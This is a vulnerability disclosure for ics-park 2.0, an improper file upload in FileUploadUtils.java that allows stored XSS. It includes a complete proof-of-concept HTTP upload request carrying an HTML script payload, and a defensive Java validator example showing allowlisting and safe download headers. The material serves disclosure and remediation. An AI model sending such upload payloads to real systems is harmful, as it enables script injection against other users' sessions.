Submit #646303: fcba_zzm ics-park 2.0 Unrestricted Upload

Title: fcba_zzm ics-park 2.0 Unrestricted Upload
Description:

ICS-Park Improper File Upload Extension Validation Leading to Stored Cross-Site Scripting (XSS)

# NAME OF AFFECTED PRODUCT(S)

* ics-park

## Vendor Homepage

https://gitee.com/fcba_zzm/

# AFFECTED AND/OR FIXED VERSION(S)

## Submitter

* yyjccc

## Vulnerable File

* FileUploadUtils.java

## Version(s)

* V2.0

## Software Link

* [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park)

# PROBLEM TYPE

## Vulnerability Type

* improper file upload → stored XSS

## Root Cause

The vulnerability originates from improper validation of uploaded file types in the ICS-Park file upload module. The system performs only weak or incomplete checks on file extensions, allowing files with dangerous types (e.g., .html, .xml) to be uploaded. Because these files are stored in a web-accessible location and served without proper content-type enforcement or sanitization, the browser interprets them as executable content.

## Impact

* Attackers can manipulate authenticated users into performing actions like changing passwords or modifying account settings, all without the user's consent.

Successful exploitation can lead to:

* Unauthorized account access or data manipulation.
* Privilege escalation or unauthorized actions performed on behalf of the user.
* Potential data loss or unauthorized data leakage.

# DESCRIPTION

* ICS-Park suffers from improper file upload validation: the system does not strictly restrict dangerous file extensions. An attacker can upload malicious files such as `.html` or `.xml`. When accessed, these files are rendered directly in the victim's browser, allowing arbitrary JavaScript execution. This issue enables a **Stored Cross-Site Scripting (XSS) vulnerability**, which could be exploited by an authenticated attacker.

# Vulnerability details and POC

## Vulnerability location:

* **`FileUploadUtils.java`**

## Payload:

Log in to the system and upload the file using the following request:

```notranslate
POST /api/dfs/upload HTTP/1.1
Host: localhost:9227
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Origin: http://localhost:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJdOygUAQDhzw1zAy
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Accept: application/json, text/plain, */*
token: d6e3601d372b42ffb2eaad21aa6b3598
sign: 96782c8471657d1505b795009245cef0
Sec-Fetch-Dest: empty
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Sec-Fetch-Mode: cors
Referer: http://localhost:8000/account/settings/base
Content-Length: 16305

------WebKitFormBoundaryJdOygUAQDhzw1zAy
Content-Disposition: form-data; name="file"; filename="xx.html"
Content-Type: image/jpeg

hi,test!<script>alert('xss')</script>
------WebKitFormBoundaryJdOygUAQDhzw1zAy--
```

## The following are screenshots of some specific information obtained from testing and running:

<img width="1555" height="575" alt="Image" src="https://github.com/user-attachments/assets/88cb862c-a6fd-4130-9488-a20c7985d9a0" />

<img width="1707" height="807" alt="Image" src="https://github.com/user-attachments/assets/12a7c689-0a8e-4ae7-9204-ea893fcce1a8" />

# Suggested repair

1. **Strict File Extension Whitelisting**: only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .xml, .html).
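The root cause and the suggested repair above come down to two server-side controls: an allowlist on file extensions instead of a blocklist, and never trusting the client-declared part type (the request above labels an HTML body as `image/jpeg`). The following is an added example, not code from ics-park or from the reporter, showing what such a validator could look like in Java. The class name `UploadValidator`, the allowlist contents, the magic-byte table and the `downloadHeaders` helper are assumptions chosen for illustration; the headers part goes slightly beyond the report's single repair step by also covering how a stored file is served so that a browser never renders it as a page.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

// Added example (not ics-park's FileUploadUtils.java): allowlist-based upload
// validation plus safe response headers for serving stored files.
public final class UploadValidator {

    // Assumed allowlist: only the image types the application actually needs.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("jpg", "jpeg", "png", "gif");

    // Leading bytes expected for each allowed type. The client-supplied part
    // Content-Type (image/jpeg in the report) is never consulted.
    private static final Map<String, byte[]> MAGIC = Map.of(
        "jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "png",  new byte[]{(byte) 0x89, 'P', 'N', 'G'},
        "gif",  new byte[]{'G', 'I', 'F', '8'}
    );

    // Server-side MIME mapping used when serving; stored files never carry their own type.
    private static final Map<String, String> SERVE_MIME = Map.of(
        "jpg", "image/jpeg", "jpeg", "image/jpeg", "png", "image/png", "gif", "image/gif"
    );

    private UploadValidator() {}

    /** Lower-cased extension of the last path segment, or null when there is none. */
    static String extensionOf(String filename) {
        if (filename == null) return null;
        // Drop any directory part the client sent (either separator style).
        int sep = Math.max(filename.lastIndexOf('/'), filename.lastIndexOf('\\'));
        String base = filename.substring(sep + 1);
        int dot = base.lastIndexOf('.');
        if (dot < 0 || dot == base.length() - 1) return null; // "file" or "file."
        return base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Allowlist check: anything not explicitly permitted (.html, .xml, .svg, ...) is rejected. */
    static boolean isAllowedExtension(String filename) {
        String ext = extensionOf(filename);
        return ext != null && ALLOWED_EXTENSIONS.contains(ext);
    }

    /** Content check: the body must start with the magic bytes of the claimed type. */
    static boolean contentMatchesExtension(String filename, byte[] head) {
        String ext = extensionOf(filename);
        byte[] magic = ext == null ? null : MAGIC.get(ext);
        if (magic == null || head == null || head.length < magic.length) return false;
        return Arrays.equals(Arrays.copyOf(head, magic.length), magic);
    }

    /** Decision for the upload handler: both the name and the content must pass. */
    static boolean accept(String filename, byte[] head) {
        return isAllowedExtension(filename) && contentMatchesExtension(filename, head);
    }

    /** Headers for a download endpoint so the browser never renders a stored file as a page. */
    static Map<String, String> downloadHeaders(String storedExtension, String downloadName) {
        Map<String, String> h = new LinkedHashMap<>();
        h.put("Content-Type", SERVE_MIME.getOrDefault(storedExtension, "application/octet-stream"));
        h.put("X-Content-Type-Options", "nosniff");   // stop MIME sniffing into text/html
        h.put("Content-Disposition", "attachment; filename=\"" + downloadName.replace("\"", "") + "\"");
        h.put("Content-Security-Policy", "sandbox");  // extra layer if inline display is ever enabled
        return h;
    }

    public static void main(String[] args) {
        // Constructed inputs mirroring the report: an HTML body sent under an image part type.
        byte[] html = "hi,test!<script>alert('xss')</script>".getBytes(StandardCharsets.UTF_8);
        byte[] jpeg = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF, (byte) 0xE0};
        System.out.println("xx.html with HTML body: " + accept("xx.html", html));
        System.out.println("xx.jpg with HTML body:  " + accept("xx.jpg", html));
        System.out.println("photo.JPG with JPEG:    " + accept("photo.JPG", jpeg));
        System.out.println(downloadHeaders("jpg", "photo.jpg"));
    }
}
```

The filename check alone is not enough: renaming the same HTML body to `xx.jpg` passes the extension allowlist, which is why `accept` also requires the first bytes to match the claimed type. The serving side matters as well, since a file that is only ever delivered with `Content-Disposition: attachment` and `nosniff` cannot be rendered as a page even if a bad file slips through.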
Source: https://github.com/Yyjccc/CVE/issues/2
User: Yyjccc (UID 89726)
Submission: 02.09.2025 18:26 (8 months ago)
Moderated: 13.09.2025 21:23 (11 days later)
Status: Accepted
VulDB Entry: 323833 [fcba_zzm ics-park Smart Park Management System 2.0 FileUploadUtils.java File Privilege Escalation]
Points: 20
